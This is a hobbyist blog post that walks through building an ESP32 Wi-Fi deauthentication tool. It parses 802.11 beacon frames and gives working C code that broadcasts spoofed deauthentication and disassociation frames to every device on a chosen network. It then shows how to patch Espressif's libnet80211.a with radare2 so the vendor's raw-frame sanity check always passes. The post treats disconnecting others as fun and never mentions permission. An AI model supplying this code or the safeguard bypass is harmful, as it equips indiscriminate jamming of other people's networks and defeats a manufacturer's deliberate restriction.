The ESP32 is a versatile Wi-Fi and Bluetooth enabled microcontroller made by Espressif. Espressif provides the ESP-IDF framework which contains tools and libraries to program an ESP32. While the majority of the ESP-IDF framework is open-source, it is unfortunately contains some binary blobs. However it is licensed under the Apache 2.0 license which allows us to modify it.

For this project, I decided to use the FireBeetle development board since it comes with a bidrectional USB to UART converter, plenty of GPIO and even an on-board Li-ion battery charger! You could however use any board that has an ESP32 or even design your own.

Necessary functions and components

The ESP-IDF provides an API to interface with the Wi-Fi hardware. I will be using the esp_wifi_set_promiscuous function which allows us to process raw IEEE 802.11 (Wi-Fi) frames. We can provide a callback function with esp_wifi_set_promiscuous_rx_cb and it will be called whenever the ESP32 receives a frame.

Another important function is the esp_wifi_80211_tx which allows us to send (almost) any frame. Unfortunately, this function does a sanity check and will prevent us from sending deauthentication frames (probably for legal reason). We will patch the libnet80211.a static library to remove those restrictions.

For the user interface, I will use an SSD1306 display and this library to control it.

Format of 802.11 frames

All the following information on 802.11 frames were found in the Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications document from the IEEE.

The frames follow this format :

The Frame control field contains information about the frame :

The only important thing for us is the Type and Subtype field which will help us filter out the frames we do not want. Here’s a sample of how the frame types and subtypes are laid out:

The frame type 00 indicates a Management frame. In our case, we will need the 1000: Beacon and 1100: Deauthentication subtypes. Also, I defined the frame types to use them later:

#define IEEE80211_FRAME_TYPE_MGMT 0b00
#define IEEE80211_FRAME_TYPE_CTRL 0b01
#define IEEE80211_FRAME_TYPE_DATA 0b10
#define IEEE80211_FRAME_TYPE_MISC 0b11

#define IEEE80211_FRAME_MGMT_SUBTYPE_ASSOCIATION_REQUEST        0b0000
#define IEEE80211_FRAME_MGMT_SUBTYPE_ASSOCIATION_RESPONSE       0b0001
#define IEEE80211_FRAME_MGMT_SUBTYPE_REASSOCIATION_REQUEST      0b0010
#define IEEE80211_FRAME_MGMT_SUBTYPE_REASSOCIATION_RESPONSE     0b0011
#define IEEE80211_FRAME_MGMT_SUBTYPE_PROBE_REQUEST              0b0100
#define IEEE80211_FRAME_MGMT_SUBTYPE_PROBE_RESPONSE             0b0101
#define IEEE80211_FRAME_MGMT_SUBTYPE_BEACON                     0b1000
#define IEEE80211_FRAME_MGMT_SUBTYPE_ATIM                       0b1001
#define IEEE80211_FRAME_MGMT_SUBTYPE_DIASSOCIATION              0b1010
#define IEEE80211_FRAME_MGMT_SUBTYPE_AUTHENTICATION             0b1011
#define IEEE80211_FRAME_MGMT_SUBTYPE_DEAUTHENTICATION           0b1100
#define IEEE80211_FRAME_MGMT_SUBTYPE_ACTION                     0b1101

#define IEEE80211_FRAME_CTRL_SUBTYPE_BLOCK_ACK_REQUEST          0b1000
#define IEEE80211_FRAME_CTRL_SUBTYPE_BLOCK_ACK                  0b1001
#define IEEE80211_FRAME_CTRL_SUBTYPE_PS_POLL                    0b1010
#define IEEE80211_FRAME_CTRL_SUBTYPE_RTS                        0b1011
#define IEEE80211_FRAME_CTRL_SUBTYPE_CTS                        0b1100
#define IEEE80211_FRAME_CTRL_SUBTYPE_ACK                        0b1101
#define IEEE80211_FRAME_CTRL_SUBTYPE_CF_END                     0b1110
#define IEEE80211_FRAME_CTRL_SUBTYPE_CF_END_CF_ACK              0b1111

#define IEEE80211_FRAME_DATA_SUBTYPE_DATA                       0b0000
#define IEEE80211_FRAME_DATA_SUBTYPE_DATA_CF_ACK                0b0001
#define IEEE80211_FRAME_DATA_SUBTYPE_DATA_CF_POLL               0b0010
#define IEEE80211_FRAME_DATA_SUBTYPE_DATA_CF_ACK_CF_POLL        0b0011
#define IEEE80211_FRAME_DATA_SUBTYPE_NULL                       0b0100
#define IEEE80211_FRAME_DATA_SUBTYPE_CF_ACK                     0b0101
#define IEEE80211_FRAME_DATA_SUBTYPE_CF_POLL                    0b0110
#define IEEE80211_FRAME_DATA_SUBTYPE_CF_ACK_CF_POLL             0b0111
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA                   0b1000
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA_CF_ACK            0b1001
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA_CF_POLL           0b1010
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_DATA_CF_ACK_CF_POLL    0b1011
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_NULL                   0b1100
/* RESERVED */
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_CF_POLL                0b1110
#define IEEE80211_FRAME_DATA_SUBTYPE_QOS_CF_ACK                 0b1111

Frame bodies

Bodies consist of information elements which follow this general format :

Each information element have their own specific format. For example the format of an SSID (the wifi network’s name you see) is :

The element ID of the SSID element can be found in the element IDs table:

So, if you wanted to encode the SSID “hotmilf”, you would end up with: [0, 7, 'h', 'o', 't', 'm', 'i', 'l', 'f'].

Beacon frames

A beacon frame is used by a router (often referred to as Access Point or AP) to advertise it’s presence to nearby listening devices. The beacon frame’s body can contain over 50 different fields, but the important one for us is the SSID.

Deauthentication frames

Deauthentication frames are (normally) sent by the access point to a station (a device connected to the network) to kick it off the network.

Parsing frames in promiscuous mode

First off, we need to include the necessary headers :

#include "esp_wifi.h"
#include "nvs_flash.h"

Then we enable the Wi-Fi on the ESP32. I have made an helper function to do all of it at once:

void initialize_wifi(wifi_promiscuous_cb_t cb){
    nvs_flash_init();
    wifi_init_config_t config = WIFI_INIT_CONFIG_DEFAULT();
    esp_wifi_init(&config);
    esp_wifi_set_mode(WIFI_MODE_STA);
    esp_wifi_start();
    esp_wifi_set_promiscuous(true);
    esp_wifi_set_promiscuous_rx_cb(cb);
}

The wifi_promiscuous_cb_t type is defined by the ESP-IDF framework as

typedef void (*wifi_promiscuous_cb_t)(void *buf, wifi_promiscuous_pkt_type_t type)

Sometimes, C types can be hard to decipher. You can either learn the spiral method or, if you’re lazy, use a tool like cdecl to translate the types into natural language. In this case, wifi_promiscuous_cb_t is a pointer to a function taking a void * and a wifi_promiscuous_pkt_type_t and returning nothing.

Here is the callback a came up with to store found Wi-Fi networks

void ieee80211_analyse_cb(void *buf, wifi_promiscuous_pkt_type_t type){
    wifi_promiscuous_pkt_t *pkt = (wifi_promiscuous_pkt_t *) buf;
    wifi_pkt_rx_ctrl_t rx_ctrl = pkt->rx_ctrl;
    uint8_t *payload = pkt->payload;

    if (type == WIFI_PKT_MISC) {
        return;
    }
    if (rx_ctrl.sig_len < 24) { // The minimum packet size is 24 (that's the MAC Header's size)
        return;
    }

    ieee80211_mac_header_t *mac_header = (ieee80211_mac_header_t *) payload;
    if (mac_header->frame_control.type == IEEE80211_FRAME_TYPE_MGMT) {           // Management
        if (mac_header->frame_control.subtype == IEEE80211_FRAME_MGMT_SUBTYPE_BEACON) {      // Beacon frame
            ap_info_t ap;
            ap.last_seen_us = esp_timer_get_time();
            ap.rssi = rx_ctrl.rssi;
            ap.channel = rx_ctrl.channel;
            ap.mac_addr = mac_header->addr3;

            bool already_known_ap = false;
            for (uint8_t i = 0 ; i < amount_of_aps ; i++){
                if (memcmp(ap.mac_addr.bytes, found_aps[i].mac_addr.bytes, 6) == 0) {
                    already_known_ap = true;

                    // We update the last time seen of the AP
                    found_aps[i].last_seen_us = ap.last_seen_us;
                    found_aps[i].rssi = ap.rssi;
                    found_aps[i].channel = ap.channel;
                }
            }

            if (already_known_ap == true) { // Wifi network already found
                return;
            }

            if (payload[36] != 0x00) { // tag number for SSID missing
                return;
            }

            ap.ssid_length = payload[37]; 
            if (ap.ssid_length < 2 || ap.ssid_length > 32){ // Invalid beacon size
                return;
            }

            memset(ap.ssid, 0x00, 32);
            memcpy(ap.ssid, &payload[38], ap.ssid_length);

            if (ap.ssid[0] == '\0'){ // The first character is illegal
                return;
            }

            found_aps[amount_of_aps] = ap;
            amount_of_aps++;
            uart_write_bytes(UART_NUM_0, ap.ssid, ap.ssid_length);
            uart_write_bytes(UART_NUM_0, "\n", 1);
        }
    } else if (mac_header->frame_control.type == IEEE80211_FRAME_TYPE_CTRL) {    // Control

    } else if (mac_header->frame_control.type == IEEE80211_FRAME_TYPE_DATA) {    // Data

    } else {                                    // Reserved

    }
}

At the beginning of the function, we do some basic checks and create variables with more meaningful names. Then we only continue if the frame is a beacon frame. After that, we check if we have already found this access point. found_aps and amount_of_aps are global variables declared previously. APs are uniquely identified with their BSSID (their MAC address).

extern ap_info_t found_aps[250];
extern uint8_t amount_of_aps;
extern uint8_t ap_index; // (Used for the interface to scroll beetween found networks)

If the AP found is a new one, we do some basic checks to make sure it’s not malformatted and store it in found_aps. The way I have it currently setup allows for only 250 aps and the check to see if the AP has already been found is O(n) where n is the number of APs found. With a hash map, it could be brought down to O(n/256) (with 256 buckets) but I didn’t bother because is the ESP32 is fast enough.

Sending deauthentication frames (the fun part)

I then made a function that takes an AP and sends a deauthentication frame on the air

void send_deauth(struct mac_addr_t *ap){
    struct mac_addr_t sta;
    sta.bytes[0] = 0xff;
    sta.bytes[1] = 0xff;
    sta.bytes[2] = 0xff;
    sta.bytes[3] = 0xff;
    sta.bytes[4] = 0xff;
    sta.bytes[5] = 0xff;

    uint8_t payload[30] = {
        0xC0, 0x00,                         // Deauthentication frame
        0x3a, 0x01,                         // Frame duration
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Destination
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // BSSID
        0x00, 0x00,                         // Sequence number
        0xf0, 0x19,                         // Reason : Unspecified
        0x00, 0x00,                         // All SSIDS
        0x21, 0x00
    };

    memcpy(&payload[4], sta.bytes, 6);
    memcpy(&payload[10], ap->bytes, 6);
    memcpy(&payload[16], ap->bytes, 6);

    payload[0] = 0xC0;
    esp_wifi_80211_tx(WIFI_IF_STA, payload, sizeof(payload), true);
    payload[0] = 0xA0;
    esp_wifi_80211_tx(WIFI_IF_STA, payload, sizeof(payload), true);
}

If you recall the MAC frame format, it has three fields for addresses. Depending on the values of the To DS and From DS in the frame control field, this dictates what address should be put in the address fields.

Here To DS and From DS should be 0 because it is a management frame.

RA: Receiving Address DA: Destination Address TA: Transmistting Address SA: Source Address You might think that the RA is always going to be the same as the DA, but that is not the case. For example, imagine the routers are in mesh mode and are connected like so : Router1 is connected to Router2 which is connected to Device1. If Router 1 wants to send a message to Device1, it has to pass by Router2. The RA will be Router2’s address and the DA will be Device1’s address.

But we don’t have to worry about that, the only thing we need to do is set address1 to the device’s address we want to deauthenticate, adress2 to the STA’s BSSID and address3 to the STA’s BSSID.

In my case, I set RA to FF:FF:FF:FF:FF:FF which is the wildcard address. So the frame we’re sending will be interpreted by listening devices as : STA sends a deauthentication frame to everyone. After sending the authentication frame, I change the subtype to a disassociation frame and send it again because more disconnecting = more funny.

After compiling everything and running, nothing works. I can see on my OLED interface the wifi networks being found but I can’t disconnect anything from the network, what’s wrong? On the serial port, I can read : unsupport frame type: 0c0.

It turns out that Espressif’s ESP-IDF prevents you from sending any frame you want. I found a page by wildspider on how to circumvent the restrictions. I recommand to read it because it goes in detail on how to patch the executable. You can read it here

It worked, but I wanted more. I wanted to patch the static library directly to not have to patch it every time I recompile. I found the location of the library I wanted to patch : esp-idf/components/esp_wifi/lib/esp32/libnet80211.a Using ar -x libnet80211.a extracted all of the object files. The guilty object file was ieee80211_output.o. I loaded it into radare2 with radare2 -a xtensa ieee80211_output.o and seeked to sym.ieee80211_raw_frame_sanity_check I tried overwriting just the necessary parts like wildspider did but I was getting relocation errors when compiling the program. It turns out the object files expect jumps from specific places and if they are not there, it gives an error. I tried a while to remove relocations from the object file but I just ended up taking the easy solution and returning immediately from the function call.

The ieee80211_raw_frame_sanity_check before/after:

[0x08002d68]> pdf
┌ 423: sym.ieee80211_raw_frame_sanity_check (int32_t arg_10h, int32_t arg_14h);
│       ╎   ; arg int32_t arg_10h @ a1+0x10
│       ╎   ; arg int32_t arg_14h @ a1+0x14
│       ╎   0x08002d68      368100         entry a1, 64
│       ╎   0x08002d6b      505074         extui a5, a5, 0, 8
│       ╎   0x08002d6e      5941           s32i.n a5, a1, 16
│      ┌──< 0x08002d70      dc53           bnez.n a3, 0x08002d89
│      │╎   0x08002d72      0c1c           movi.n a12, 1
│      │╎   0x08002d74      4c0b           movi.n a11, 64
│      │╎   0x08002d76      ad0c           mov.n a10, a12
│      │╎   0x08002d78      d1e6ff         l32r a13, 0x08002d10        ; [0x8002d10:4]=0
│      │╎   0x08002d7b      c02000         memw
│      │╎   0x08002d7e      81f1ff         l32r a8, 0x08002d44         ; [0x8002d44:4]=0
│      │╎   0x08002d81      e00800         callx8 a8
│     ┌───< 0x08002d84      060d00         j 0x08002dbc
[...]

to

[0x08002d68]> pdf
┌ 8: sym.ieee80211_raw_frame_sanity_check ();
│ rg: 0 (vars 0, args 0)
│ bp: 0 (vars 0, args 0)
│ sp: 0 (vars 0, args 0)
│           0x08002d68      368100         entry a1, 64
│           0x08002d6b      22a000         movi a2, 0
└           0x08002d6e      1df0           retw.n

The a2 register is the return value, I set it to 0 to return that the message is OK. I repacked all objects into the libnet80211.a and I was able to compile, run and deauthenticate without any problem!

This was my first project with an ESP32 and I’m quite happy with the result. I learned a few things about the components system of ESP-IDF and the inner workings of Wi-Fi and the basics of Wireshark.